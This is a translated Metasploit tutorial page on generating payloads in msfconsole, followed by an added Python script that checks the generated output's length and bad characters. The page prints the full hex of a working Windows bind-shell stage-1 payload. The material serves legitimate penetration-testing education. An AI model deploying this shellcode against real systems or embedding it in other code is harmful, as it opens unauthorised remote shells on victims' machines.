Generating Payloads
From www.metasploit-es.com.ar
Generating Payloads in Metasploit
While developing an exploit, you will probably need to generate shellcode to use in it. In Metasploit, payloads can be generated from within msfconsole: when you 'use' a particular payload, Metasploit adds the 'generate' command.
    msf > use payload/windows/shell/bind_tcp
    msf payload(bind_tcp) > help
    ...snip...

    Payload Commands
    ================

        Command     Description
        -------     -----------
        generate    Generates a payload

    msf payload(bind_tcp) > generate -h
    Usage: generate [options]

    Generates a payload.

    OPTIONS:

        -E   Force encoding.
        -b   The list of characters to avoid: '\x00\xff'
        -e   The name of the encoder module to use.
        -f   The output file name (otherwise stdout)
        -h   Help banner.
        -i   the number of encoding iterations.
        -k   Keep the template executable functional
        -o   A comma separated list of options in VAR=VAL format.
        -p   The Platform for output.
        -s   NOP sled length.
        -t   The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
        -x   The executable template to use
To generate shellcode without any options, simply run the 'generate' command.

    msf payload(bind_tcp) > generate
    # windows/shell/bind_tcp - 298 bytes (stage 1)
    # http://www.metasploit.com
    # EXITFUNC=thread, LPORT=4444, RHOST=
    buf =
    "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
    "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
    "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
    "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
    "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
    "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
    "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
    "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
    "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
    "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
    "\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" +
    "\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" +
    "\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" +
    "\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x31\xdb" +
    "\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\xc2" +
    "\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" +
    "\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75" +
    "\x6e\x4d\x61\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9" +
    "\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56" +
    "\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56" +
    "\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85" +
    "\xf6\x75\xec\xc3"
    ...snip...
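As an added example (not part of the original page, and not Metasploit code), a small Python checker for the Ruby-formatted output that 'generate' prints: it parses the "\x.." literals back into bytes, verifies that the byte count in the header matches, and reports any byte that falls in a bad-character list written the way the -b option takes it. The embedded sample is constructed from the first two lines of the buffer above, with the header's byte count adjusted to that truncation.

```python
import re

# Constructed sample in the format msfconsole's `generate` prints (a Ruby
# string literal): the first two byte lines of the output shown above, with
# the header byte count adjusted to match the truncation.
SAMPLE_OUTPUT = r'''# windows/shell/bind_tcp - 28 bytes (stage 1)
# http://www.metasploit.com
# EXITFUNC=thread, LPORT=4444, RHOST=
buf =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"
'''

HEADER_RE = re.compile(r'^#\s*(\S+)\s+-\s+(\d+)\s+bytes', re.MULTILINE)
LITERAL_RE = re.compile(r'"((?:\\x[0-9a-fA-F]{2})*)"')
HEX_RE = re.compile(r'\\x([0-9a-fA-F]{2})')


def parse_generate_output(text):
    """Return (payload_name, declared_length, shellcode_bytes)."""
    m = HEADER_RE.search(text)
    if not m:
        raise ValueError("missing '# <payload> - N bytes' header")
    # Concatenate every "\x.." literal, as Ruby's '+' does at runtime.
    raw = bytes(int(h, 16) for lit in LITERAL_RE.findall(text)
                for h in HEX_RE.findall(lit))
    return m.group(1), int(m.group(2)), raw


def parse_badchars(spec):
    """Parse a bad-character list written like the -b option: '\\x00\\xff'."""
    return {int(h, 16) for h in HEX_RE.findall(spec)}


def find_bad_chars(shellcode, badchars):
    """Return (offset, byte) for every byte that is in the bad-character set."""
    return [(i, b) for i, b in enumerate(shellcode) if b in badchars]


def check(text, badchar_spec):
    """Check declared length and bad-character absence; return a report."""
    name, declared, raw = parse_generate_output(text)
    hits = find_bad_chars(raw, parse_badchars(badchar_spec))
    return {
        "payload": name,
        "declared_length": declared,
        "actual_length": len(raw),
        "length_ok": declared == len(raw),
        "bad_char_hits": hits,  # empty means the -b list was honoured
    }
```

Running `check(SAMPLE_OUTPUT, r"\x00\xff")` on the sample reports the three NUL bytes at offsets 3, 4 and 5, which is exactly what an encoder chosen with -e and -b '\x00\xff' is expected to remove.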
© Offensive Security 2009
Original from www.offensive-security.com. Translated by cbk999